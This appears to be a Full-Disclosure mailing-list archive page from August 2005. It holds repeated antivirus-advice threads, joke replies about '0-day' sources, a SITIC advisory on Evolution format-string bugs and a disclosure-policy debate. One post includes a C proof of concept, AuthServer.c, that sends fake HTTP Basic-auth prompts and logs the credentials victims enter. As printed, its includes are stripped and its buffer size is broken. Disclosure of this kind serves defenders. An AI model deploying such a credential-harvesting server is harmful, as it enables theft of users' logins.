iD8DBQFC+i91cRMkOnlkwMERApVtAKCEYEB83FhiFcgtOZGvznEDW3rjZQCfY7mv
4bYlcJ5Xe6UvLI9QO6Zji9w=
=PLGC
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

RE: [Full-disclosure] Antivirus

Title: Antivirus




One word.  BitDefender.  
 
more words...  New version coming out next week!  
not as expensive as Symantec.  Faster updates..
 
www.bitdefender.us


From: [EMAIL PROTECTED] 
[mailto:[EMAIL PROTECTED] On Behalf Of Jason 
BethuneSent: Wednesday, August 10, 2005 12:21 PMTo: 
full-disclosure@lists.grok.org.ukSubject: [Full-disclosure] 
Antivirus

I know this is not really 
the place to ask this question but I need some professional advice and well you 
guys know a lot. I need to get rid of our current Antivirus 
solution in the small 20+ user network we have running on SBS 2003. Currently 
running NAV 7.6 Corporate Edition. Any opinions on the new version of Norton 
10.0? Should I look at Trend Micro? Both seem to priced about the same for 
Canadian customers. I hope this is not too way off topic but I 
don’t post here very often. If you can give me some advice 
that would be greatly appreciated.
Jason

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

RE: [Full-disclosure] Antivirus

Do you find the client side of it runs well? My RTVSCAN.exe on a lot of
machines in the office are starting to eat up 100% CPU. This is another
reason I need to upgrade. 

Jason Bethune

IT Specialist
Town of Kentville
354 Main Street
Kentville, NS 
B4N 1K6

www.town.kentville.ns.ca

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Evan Waite
Sent: Wednesday, August 10, 2005 1:34 PM
To: full-disclosure@lists.grok.org.uk
Subject: RE: [Full-disclosure] Antivirus

Actually NAV Corp (aka SAV) works fine in Application and Admin mode for
Terminal services.  We've just completed an upgrade and so far
everything is working fine.  I would however recommend you only use
10.0.1.1000 (current) or higher (the first build of 10.0 was a little
flaky)

-E

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Jason
Bethune
Sent: Wednesday, August 10, 2005 10:29 AM
To: 'Steve Friedl'
Cc: full-disclosure@lists.grok.org.uk
Subject: RE: [Full-disclosure] Antivirus

I only use Terminal Services in admin mode for my servers from home. I
know
my current NAV doesn't like TS at all. I am a bit sick of Norton
(Symantec)
and how much resources it take sup on the computers which the client is
installed.

Jason Bethune

IT Specialist
Town of Kentville
354 Main Street
Kentville, NS 
B4N 1K6

www.town.kentville.ns.ca

-Original Message-
From: Steve Friedl [mailto:[EMAIL PROTECTED] 
Sent: Wednesday, August 10, 2005 1:23 PM
To: Jason Bethune
Subject: Re: [Full-disclosure] Antivirus

On Wed, Aug 10, 2005 at 01:20:31PM -0300, Jason Bethune wrote:
> I know this is not really the place to ask this question but I need
some
> professional advice and well you guys know a lot. I need to get rid of
our
> current Antivirus solution in the small 20+ user network we have
running
on
> SBS 2003. Currently running NAV 7.6 Corporate Edition. Any opinions on
the
> new version of Norton 10.0? Should I look at Trend Micro? Both seem to
> priced about the same for Canadian customers. I hope this is not too
way
off
> topic but I don't post here very often. If you can give me some advice
that
> would be greatly appreciated.

One tidbit: if you use RAdmin (remote administration software), Symantec
10. corporate sees it as a threat, and there's not any really good way
to centrally deal with this. It's been a terrible mess.

Steve

-- 
Stephen J Friedl | Security Consultant |  UNIX Wizard  |   +1 714
544-6561
www.unixwiz.net  | Tustin, Calif. USA  | Microsoft MVP |
[EMAIL PROTECTED]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

RE: [Full-disclosure] Antivirus

Yes I meant to say my current corporate edition runs fine on my servers for
the most part, other than the yellow exclamation point in the VPtray in the
systray. I am mostly worried about how well these AV's perform on systems.
Need central administration for the program and the ability to lockout users
from performing any tasks related to the AV program.

Jason Bethune

IT Specialist
Town of Kentville
354 Main Street
Kentville, NS 
B4N 1K6

www.town.kentville.ns.ca

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Larry
Seltzer
Sent: Wednesday, August 10, 2005 1:33 PM
To: full-disclosure@lists.grok.org.uk
Subject: RE: [Full-disclosure] Antivirus

NAV and Symantec Corporate Edition aren't the same thing, although I don't
know for a fact that Corporate runs fine on a Terminal Server. 

Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blog.ziffdavis.com/seltzer
Contributing Editor, PC Magazine
[EMAIL PROTECTED] 

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Jason
Bethune
Sent: Wednesday, August 10, 2005 12:29 PM
To: 'Steve Friedl'
Cc: full-disclosure@lists.grok.org.uk
Subject: RE: [Full-disclosure] Antivirus

I only use Terminal Services in admin mode for my servers from home. I know
my current NAV doesn't like TS at all. I am a bit sick of Norton (Symantec)
and how much resources it take sup on the computers which the client is
installed.

Jason Bethune

IT Specialist
Town of Kentville
354 Main Street
Kentville, NS
B4N 1K6

www.town.kentville.ns.ca

-Original Message-
From: Steve Friedl [mailto:[EMAIL PROTECTED]
Sent: Wednesday, August 10, 2005 1:23 PM
To: Jason Bethune
Subject: Re: [Full-disclosure] Antivirus

On Wed, Aug 10, 2005 at 01:20:31PM -0300, Jason Bethune wrote:
> I know this is not really the place to ask this question but I need 
> some professional advice and well you guys know a lot. I need to get 
> rid of our current Antivirus solution in the small 20+ user network we 
> have running
on
> SBS 2003. Currently running NAV 7.6 Corporate Edition. Any opinions on 
> the new version of Norton 10.0? Should I look at Trend Micro? Both 
> seem to priced about the same for Canadian customers. I hope this is 
> not too way
off
> topic but I don't post here very often. If you can give me some advice
that
> would be greatly appreciated.

One tidbit: if you use RAdmin (remote administration software), Symantec 10.
corporate sees it as a threat, and there's not any really good way to
centrally deal with this. It's been a terrible mess.

Steve

-- 
Stephen J Friedl | Security Consultant |  UNIX Wizard  |   +1 714 544-6561
www.unixwiz.net  | Tustin, Calif. USA  | Microsoft MVP | [EMAIL PROTECTED]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

RE: [Full-disclosure] Antivirus

2005-08-10 Thread Evan Waite

Actually NAV Corp (aka SAV) works fine in Application and Admin mode for
Terminal services.  We've just completed an upgrade and so far
everything is working fine.  I would however recommend you only use
10.0.1.1000 (current) or higher (the first build of 10.0 was a little
flaky)

-E

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Jason
Bethune
Sent: Wednesday, August 10, 2005 10:29 AM
To: 'Steve Friedl'
Cc: full-disclosure@lists.grok.org.uk
Subject: RE: [Full-disclosure] Antivirus

I only use Terminal Services in admin mode for my servers from home. I
know
my current NAV doesn't like TS at all. I am a bit sick of Norton
(Symantec)
and how much resources it take sup on the computers which the client is
installed.

Jason Bethune

IT Specialist
Town of Kentville
354 Main Street
Kentville, NS 
B4N 1K6

www.town.kentville.ns.ca

-Original Message-
From: Steve Friedl [mailto:[EMAIL PROTECTED] 
Sent: Wednesday, August 10, 2005 1:23 PM
To: Jason Bethune
Subject: Re: [Full-disclosure] Antivirus

On Wed, Aug 10, 2005 at 01:20:31PM -0300, Jason Bethune wrote:
> I know this is not really the place to ask this question but I need
some
> professional advice and well you guys know a lot. I need to get rid of
our
> current Antivirus solution in the small 20+ user network we have
running
on
> SBS 2003. Currently running NAV 7.6 Corporate Edition. Any opinions on
the
> new version of Norton 10.0? Should I look at Trend Micro? Both seem to
> priced about the same for Canadian customers. I hope this is not too
way
off
> topic but I don't post here very often. If you can give me some advice
that
> would be greatly appreciated.

One tidbit: if you use RAdmin (remote administration software), Symantec
10. corporate sees it as a threat, and there's not any really good way
to centrally deal with this. It's been a terrible mess.

Steve

-- 
Stephen J Friedl | Security Consultant |  UNIX Wizard  |   +1 714
544-6561
www.unixwiz.net  | Tustin, Calif. USA  | Microsoft MVP |
[EMAIL PROTECTED]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

RE: [Full-disclosure] Antivirus

2005-08-10 Thread Larry Seltzer

NAV and Symantec Corporate Edition aren't the same thing, although I don't
know for a fact that Corporate runs fine on a Terminal Server. 

Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blog.ziffdavis.com/seltzer
Contributing Editor, PC Magazine
[EMAIL PROTECTED] 

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Jason
Bethune
Sent: Wednesday, August 10, 2005 12:29 PM
To: 'Steve Friedl'
Cc: full-disclosure@lists.grok.org.uk
Subject: RE: [Full-disclosure] Antivirus

I only use Terminal Services in admin mode for my servers from home. I know
my current NAV doesn't like TS at all. I am a bit sick of Norton (Symantec)
and how much resources it take sup on the computers which the client is
installed.

Jason Bethune

IT Specialist
Town of Kentville
354 Main Street
Kentville, NS
B4N 1K6

www.town.kentville.ns.ca

-Original Message-
From: Steve Friedl [mailto:[EMAIL PROTECTED]
Sent: Wednesday, August 10, 2005 1:23 PM
To: Jason Bethune
Subject: Re: [Full-disclosure] Antivirus

On Wed, Aug 10, 2005 at 01:20:31PM -0300, Jason Bethune wrote:
> I know this is not really the place to ask this question but I need 
> some professional advice and well you guys know a lot. I need to get 
> rid of our current Antivirus solution in the small 20+ user network we 
> have running
on
> SBS 2003. Currently running NAV 7.6 Corporate Edition. Any opinions on 
> the new version of Norton 10.0? Should I look at Trend Micro? Both 
> seem to priced about the same for Canadian customers. I hope this is 
> not too way
off
> topic but I don't post here very often. If you can give me some advice
that
> would be greatly appreciated.

One tidbit: if you use RAdmin (remote administration software), Symantec 10.
corporate sees it as a threat, and there's not any really good way to
centrally deal with this. It's been a terrible mess.

Steve

-- 
Stephen J Friedl | Security Consultant |  UNIX Wizard  |   +1 714 544-6561
www.unixwiz.net  | Tustin, Calif. USA  | Microsoft MVP | [EMAIL PROTECTED]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

RE: [Full-disclosure] Antivirus

I only use Terminal Services in admin mode for my servers from home. I know
my current NAV doesn't like TS at all. I am a bit sick of Norton (Symantec)
and how much resources it take sup on the computers which the client is
installed.

Jason Bethune

IT Specialist
Town of Kentville
354 Main Street
Kentville, NS 
B4N 1K6

www.town.kentville.ns.ca

-Original Message-
From: Steve Friedl [mailto:[EMAIL PROTECTED] 
Sent: Wednesday, August 10, 2005 1:23 PM
To: Jason Bethune
Subject: Re: [Full-disclosure] Antivirus

On Wed, Aug 10, 2005 at 01:20:31PM -0300, Jason Bethune wrote:
> I know this is not really the place to ask this question but I need some
> professional advice and well you guys know a lot. I need to get rid of our
> current Antivirus solution in the small 20+ user network we have running
on
> SBS 2003. Currently running NAV 7.6 Corporate Edition. Any opinions on the
> new version of Norton 10.0? Should I look at Trend Micro? Both seem to
> priced about the same for Canadian customers. I hope this is not too way
off
> topic but I don't post here very often. If you can give me some advice
that
> would be greatly appreciated.

One tidbit: if you use RAdmin (remote administration software), Symantec
10. corporate sees it as a threat, and there's not any really good way
to centrally deal with this. It's been a terrible mess.

Steve

-- 
Stephen J Friedl | Security Consultant |  UNIX Wizard  |   +1 714 544-6561
www.unixwiz.net  | Tustin, Calif. USA  | Microsoft MVP | [EMAIL PROTECTED]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Antivirus

Title: Antivirus






I know this is not really the place to ask this question but I need some professional advice and well you guys know a lot. I need to get rid of our current Antivirus solution in the small 20+ user network we have running on SBS 2003. Currently running NAV 7.6 Corporate Edition. Any opinions on the new version of Norton 10.0? Should I look at Trend Micro? Both seem to priced about the same for Canadian customers. I hope this is not too way off topic but I don’t post here very often. If you can give me some advice that would be greatly appreciated.

Jason




___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Cross-site http authentication

2005-08-10 Thread JustAsFire

Discovered: by JustAsFire [EMAIL PROTECTED]

Vulnerable: Any web page in which you can insert images hosted on
other servers.

Description: If a web page contains an image from a site which
requires authentication, an Username/Password prompt displaying host
name and authentication realm will appear asking for username and
password. A malicious http server could be used to log the
credientials of the users who would authenticate.

POC:

/***
***name : AuthServer.c
***author   : JustAsFire JustAsFire[at]gmail.com
***description  : a very simple web server which sends a  401
Authorization request to anyone
***   connecting to it. If the client authetificates it stores the
username and password
***   in the file userlog(encrypted in base64).
***
***
*/
#include 
#include 
#include 
#include 
#include 
#include 
#include 


#define MAXPENDING 5
#define BUFFSIZE 1
void Die(char *mess) { perror(mess); exit(1); }

int GetCredientials(char *buffer){
char s[200], *p;
int i;
FILE *f;
p=strstr(buffer, "Authorization: Basic ");
if (p){ 

if ( strlen(p)>50 ){
printf("Buffer overflow atempt");
return 0;
}

for (i=0; i+25 < strlen(p); i++)
s[i]=p[21+i];

printf("\n%s\n",s);
f=fopen("userlog", "a");
fprintf(f,"%s\n",s);
fclose(f);
return 1;
}
else return 0;
}

void HandleClient(int sock){
char buffer[BUFFSIZE];
char *s;

if (read(sock, buffer, BUFFSIZE) <0)
Die("Failed to receive bytes from client");

if ( GetCredientials(buffer)==0 ){
char *s="HTTP/1.1 401 Authorization Require\nServer: 
AuthServer/0.01
(Unix)\nWWW-Authenticate: Basic realm=\"...It's a scam don't do it...
\"\nKeep-Alive: timeout=15, max=100\nConnection:
Keep-Alive\nTransfer-Encoding: chunked\nContent-Type: text/html;
charset=iso-8859-1\n\n";
write(sock,s,strlen(s));

}
close(sock);
}

int main (int argc, char *argv[]) {
int serversock, clientsock;
struct sockaddr_in server, client;

if ( argc != 2 ) {
fprintf(stderr, "USAGE: AuthServer \n");
exit(1);
}
if ((serversock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
  Die("Failed to create socket");
}

memset(&server, 0, sizeof(server));   
server.sin_family = AF_INET;  
server.sin_addr.s_addr = htonl(INADDR_ANY);   
server.sin_port = htons(atoi(argv[1]));   

if (bind(serversock, (struct sockaddr *) &server, sizeof(server)) < 0) {
 Die("Failed to bind the server socket");
  }
  
if (listen(serversock, MAXPENDING) < 0) {
Die("Failed to listen on server socket");
}
   
fprintf(stdout,"Created by: JustAsFire -- JustAsFire[at]gmail.com\n");
fprintf(stdout,"Listening for connections...\n");

while (1) {
unsigned int clientlen = sizeof(client);
if ((clientsock = accept(serversock, (struct sockaddr
*) &client, &clientlen)) < 0) {
Die("Failed to accept client connection");
}
fprintf(stdout, "Client connected: %s\n",
inet_ntoa(client.sin_addr));
HandleClient(clientsock);
}
}
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

RE: [Full-disclosure] The best 0-day exploit source

2005-08-10 Thread srenna

LMFAO

Security folks are the best

what a dumb ass, where can i get 0-days WAA

http://home.maine.rr.com/mattyg/wambulance.jpg



>  Original Message 
> Subject: Re: [Full-disclosure] The best 0-day exploit source
> From: Stefan Schlott <[EMAIL PROTECTED]>
> Date: Wed, August 10, 2005 10:07 am
> To: full-disclosure@lists.grok.org.uk
> 
> Javi Polo wrote:
> 
> >>>can anybody suggest a website???
> >>
> >>http://127.0.0.1/0-d-Xpl0iz
> > 
> > 
> > [EMAIL PROTECTED]:~$ wget http://127.0.0.1/0-d-Xpl0iz
> > --13:55:05--  http://127.0.0.1/0-d-Xpl0iz
> >=> `0-d-Xpl0iz'
> > Connecting to 127.0.0.1:80... connected.
> > HTTP request sent, awaiting response... 403 Forbidden
> > 13:55:05 ERROR 403: Forbidden.
> > 
> > [EMAIL PROTECTED]:~$ 
> > 
> > who runs the site?
> > I want access
> 
> Hm, perhaps you should consult some... hm... adequate literature:
>http://ars.userfriendly.org/cartoons/?id=20010523
> 
> scnr ;)
> -- 
> *--- please cut here... -- thanks! ---*
> |-> E-Mail: [EMAIL PROTECTED]   PGP-Key: 0x2F36F4FE <-|
> | Apart from NT, I've never known any other system to crash while in its  |
> | idle loop.  |
> |   -- Seen on Slashdot (14.02.2000)  |
> *-*
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] The best 0-day exploit source

2005-08-10 Thread Samuel Beckett

 > can anybody suggest a website???

http://www.braindeath.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] The best 0-day exploit source

2005-08-10 Thread James Longstreet

On Wed, 10 Aug 2005, Ahmad N wrote:

>  can anybody suggest a website???

http://www.sourceforge.net/

There's hundreds of 0-days there.  They're pretty well hidden though,
you'll have to do a lot of inspection to find them.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] The best 0-day exploit source

2005-08-10 Thread Adi Pircalabu

On Wed, 10 Aug 2005 13:56:04 +0200
Javi Polo <[EMAIL PROTECTED]> wrote:

> > >can anybody suggest a website???
> > http://127.0.0.1/0-d-Xpl0iz
> 
> [EMAIL PROTECTED]:~$ wget http://127.0.0.1/0-d-Xpl0iz
> --13:55:05--  http://127.0.0.1/0-d-Xpl0iz
>=> `0-d-Xpl0iz'
> Connecting to 127.0.0.1:80... connected.
> HTTP request sent, awaiting response... 403 Forbidden
> 13:55:05 ERROR 403: Forbidden.

wget is known to be broken on 127.0.0.1

-- 
Adrian Pircalabu


-- 
This message was scanned for spam and viruses by BitDefender.
For more information please visit http://www.bitdefender.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] The best 0-day exploit source

2005-08-10 Thread Brian Beck

> [EMAIL PROTECTED]:~$ wget http://127.0.0.1/0-d-Xpl0iz
> --13:55:05--  http://127.0.0.1/0-d-Xpl0iz
>=> `0-d-Xpl0iz'
> Connecting to 127.0.0.1:80... connected.
> HTTP request sent, awaiting response... 403 Forbidden
> 13:55:05 ERROR 403: Forbidden.

[EMAIL PROTECTED]:~$ wget http://127.0.0.1/0-d-Xpl0iz
--10:10:30--  http://127.0.0.1/0-d-Xpl0iz
=> `0-d-Xpl0iz'
Connecting to 127.0.0.1:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]

[ <=> ] 2,090 --.--K/s

10:10:30 (1364.30 MB/s) - `index.html' saved [2090]

Works fine here...appears to be a pretty fast site, too!

(nullman: just in case... see http://www.wordreference.com/definition/sarcasm)
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re[2]: [Full-disclosure] The best 0-day exploit source

2005-08-10 Thread Javier Reoyo



lol..!! try on 127.0.0.2, is a mirror ;)

> On Aug/10/2005, [EMAIL PROTECTED] wrote:

>> >can anybody suggest a website???
>> http://127.0.0.1/0-d-Xpl0iz

> [EMAIL PROTECTED]:~$ wget http://127.0.0.1/0-d-Xpl0iz
> --13:55:05--  http://127.0.0.1/0-d-Xpl0iz
>=> `0-d-Xpl0iz'
> Connecting to 127.0.0.1:80... connected.
> HTTP request sent, awaiting response... 403 Forbidden
> 13:55:05 ERROR 403: Forbidden.

> [EMAIL PROTECTED]:~$ 

> who runs the site?
> I want access




-- 
Regards,
 Javiermailto:[EMAIL PROTECTED]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] The best 0-day exploit source

2005-08-10 Thread Stefan Schlott


Javi Polo wrote:


can anybody suggest a website???


http://127.0.0.1/0-d-Xpl0iz



[EMAIL PROTECTED]:~$ wget http://127.0.0.1/0-d-Xpl0iz
--13:55:05--  http://127.0.0.1/0-d-Xpl0iz
   => `0-d-Xpl0iz'
Connecting to 127.0.0.1:80... connected.
HTTP request sent, awaiting response... 403 Forbidden
13:55:05 ERROR 403: Forbidden.

[EMAIL PROTECTED]:~$ 


who runs the site?
I want access


Hm, perhaps you should consult some... hm... adequate literature:
  http://ars.userfriendly.org/cartoons/?id=20010523

scnr ;)
--
*--- please cut here... -- thanks! ---*
|-> E-Mail: [EMAIL PROTECTED]   PGP-Key: 0x2F36F4FE <-|
| Apart from NT, I've never known any other system to crash while in its  |
| idle loop.  |
|   -- Seen on Slashdot (14.02.2000)  |
*-*
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Evolution multiple remote format string bugs

2005-08-10 Thread sitic

* SITIC Vulnerability Advisory *

   Advisory Name: Evolution multiple remote format string bugs
  Advisory Reference: SA05-001
 Date of initial release: 2005-08-10
 Product: Evolution 1.5, 2.0, 2.1, 2.2, 2.3
Platform: Linux, BSD systems, Unix
  Effect: Remote code execution
Vulnerability Identifier: Not assigned


Overview:

Evolution suffers from several format string bugs when handling data from
remote sources. These bugs lead to crashes or the execution of arbitrary
assembly language code.


Details:

1) The first format string bug occurs when viewing the full vCard data
attached to an e-mail message.

When opening an e-mail message, only a compact view of some of the fields
from the vCard is displayed, and this does not trigger the vulnerability.
To be affected, the user must click on Show Full vCard or perform similar
actions such as clicking on Save in Addressbook and then viewing the saved
data under the Contacts tab.

Why is this important? An attacker might notice that an organisation uses
Evolution, for instance after seeing the "X-Mailer: Evolution x.y.z" e-mail
header in their e-mails. He or she could then send out e-mail messages with
malicious vCards to many e-mail accounts at the organisation, in the hope
that some of the recipients will view the full vCard data sooner or later,
thus exposing the organisation to this format string bug.


2) The second format string bug occurs when displaying contact data from
remote LDAP servers.


3) The third format string bug occurs when displaying task list data from
remote servers.


4) The fourth, and least serious, format string bug occurs when the user
goes to the Calendars tab to save task list data that is vulnerable to
problem 3 above. Other calendar entries that do not come from task lists
are also affected.


Mitigating factors:

Users that never use any of the vulnerable features in Evolution are not
affected.


Affected versions:

  o  Evolution 1.5 to Evolution 2.3.6.1


Recommendations:

We recommend that users either upgrade to Evolution 2.3.7 (unstable) or
apply our unofficial patch to their Evolution installation.


Patch information:

Evolution 2.3.7 is available from the following source:

  o  http://ftp.gnome.org/pub/gnome/sources/evolution/

Our unofficial patch is available from our home page:

  o  http://www.sitic.se


Acknowledgments:

These vulnerabilities were discovered by Ulf Harnhammar for SITIC, Swedish
IT Incident Centre.


Contact information:

Swedish IT Incident Centre, SITIC
P O Box 5398, SE-102 49 Stockholm, Sweden
Telephone: +46-8-678 5799
Email: sitic at pts dot se
http://www.sitic.se


Revision history:

First published 2005-08-10


About SITIC:

The Swedish IT Incident Centre within the National Post and Telecom Agency
has the task to support society in working with protection against IT
incidents. SITIC facilitates exchange of information regarding IT incidents
between organisations in society, and disseminates information about new
problems which potentially may impede the functionality of IT systems. In
addition, SITIC provides information and advice regarding proactive measures
and compiles and publishes statistics.


Disclaimer:

The decision to follow or act on information or advice contained in this
Vulnerability Advisory is the responsibility of each user or organisation.
SITIC accepts no responsibility for any errors or omissions contained within
this Vulnerability Advisory, nor for any consequences which may arise from
following or acting on information or advice contained herein.


evolution.formatstring.patch
Description: evolution.formatstring.patch
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

RE: [Full-disclosure] Plaxo?

2005-08-10 Thread Todd Towles

> One small problem that may not have been noticed with Plaxo. 
> If the Plaxo using person decides to do so,  you can be a 
> non-Plaxo using person on that externally managed address 
> book with full email address also in there, added by the 
> Plaxo user. I have received "I have updated my Plaxo" for 
> whatever was updated, by several customers, at my help line 
> email address and have checked it out when at their premises. 
> Sure enough, there is my email address externally managed.
> 
> So, whether you allow Plaxo or not, if some user outside of 
> your company has all your email addresses within your company 
> on their computer, it has also likely been added to Plaxo by 
> them whether you like it or not.

Of course this would lead to increased spam and viruses at your mail
server, due to the spreading of e-mail addresses to computers that are
managed by people that aren't exactly security focused. Like I need
more...your computer is infected with a virus...junk mail.

-Todd
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] "responsible disclosure" explanation (an exampleof the fallacy of idealistic thought)

2005-08-10 Thread Ken Pfeil


These are outdated:

On page 3:

Vulnerability Disclosure Process

Internet Security Systems’ X-Force engages in active programs of 
original Internet and network security research. The disclosure of 
vulnerability information is provided as a public service to
vendors, Internet Security Systems’ customers and the general public. 
The X-Force vulnerability disclosure process is divided into four stages:


I. Initial Discovery Phase
II. Vendor Notification Phase
III. Customer Notification Phase
IV. Public Disclosure Phase



"V." should read - Publicly bitch slap researcher and sue them off the 
planet (It's possible that this could also be substituted for Step II, 
III or IV depending upon the number of lawyers involved).


on page 4:

V. Accelerated Disclosure/Procedural Exceptions

X-Force reserves the right to accelerate the publication of the 
vulnerability information at any time if one or more of the following 
events occur:

• The vendor issues a patch or announcement regarding the vulnerability.
• An in-depth discussion of the vulnerability appears on a public 
mailing list.
• Active exploitation of any form related to the vulnerability is 
observed on the Internet.
• ISS receives evidence from reliable sources that an exploit is 
available in the wild.

• The vulnerability is reported by the media.
• The vendor becomes unresponsive.

The following point should be added here, and "V" changed to "VI"
• Refer to section V, above as these points are now moot. It does not 
matter that reliable techniques for exploitation are already being used, 
a patch is available, or the vendor becomes "unresponsive". If we're 
going to get sued by an 800lb Gorilla, it's every man for himself.


-k

Ingevaldson, Dan (ISS Atlanta) wrote:

Just in case anyone is interested, the ISS Vulnerability Disclosure
Guidelines were made public a couple years ago, and last revised on July
15, 2004.  The document is available here:

http://documents.iss.net/literature/vulnerability_guidelines.pdf

Regards,

--
Daniel Ingevaldson
Director, X-Force PSS
[EMAIL PROTECTED] 
404-236-3160
 
Internet Security Systems, Inc.

Ahead of the Threat
http://www.iss.net
 


-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Matthew
Murphy
Sent: Tuesday, August 09, 2005 2:43 AM
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] "responsible disclosure" explanation (an
exampleof the fallacy of idealistic thought)

Let me just define "responsible disclosure" first of all, so as to
dissociate myself from the lunatic lawyers of certain corporations
(Cisco, HP, ISS, et al) who define "responsible disclosure" as
"non-disclosure".  The generally accepted definition of responsible
disclosure is simply allowing vendors advance notification to fix
vulnerabilities in their products before information describing such
vulnerabilities is released.  The overwhelming majority of researchers
put a ceiling on what they consider "responsible" timelines on a
vendor's part, but these vary widely.

Jason Coombs wrote:


"responsible disclosure" causes serious harm to people. It is no 
different than being an accessory to the intentional destruction of 
innocent lives.



You seriously overstate the facts here, as a minute number of software
vulnerabilities pose any threat to human life.  In the cases where a
software flaw could potentially be responsible for the loss of an
innocent life, the greatest error is still one in human judgment.


Anyone who believes that "responsible disclosure" is a good thing 
needs to volunteer their time to teach law enforcement, judges, 
prosecutors, and attorneys that the consequence of everyone 
communicating with everyone else online is that some people use secret



knowledge of security vulnerabilities to ruin other people's lives or 
commit crimes by hijacking innocent persons' vulnerable computers.



You manage to draw absolutely no parallel between these two, so I'll try
and draw one for you.  Limiting knowledge of vulnerabilities to any
select group (no matter who they are) is a bad idea, because it
necessarily renders the uninformed incapable of self-protection.

In reality, this theory is denied by historical evidence, and stands
directly opposed to virtually all actions of modern law enforcement.  
I'll even use the analogy of a person moving illegal material (we can

even say child porn, for simplicity's sake) to show you why your theory
of disclosure is irreparably flawed.  Say I discover a weakness in the
security measures of an airline, that allows me access to passenger
luggage after it has been screened.  Clearly, the implications include a
direct threat to human life: the scenario of explosives hidden in
checked baggage is a very real threat.

Do I announce over the public address system that an airline's screening
procedures are weak and easily defeated, and reveal the exact steps
necessary to do so?  Of course not!  It's an engraved invitatio

Re: [Full-disclosure] The best 0-day exploit source

2005-08-10 Thread sec-list


nullman wrote:

try ifconfig -a and carefully read the oputput .. you may find a hint :-)


and: 'ipconfig /all' won't give you a hint :-P

GTi
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

RE: [Full-disclosure] perfect security architecture (network)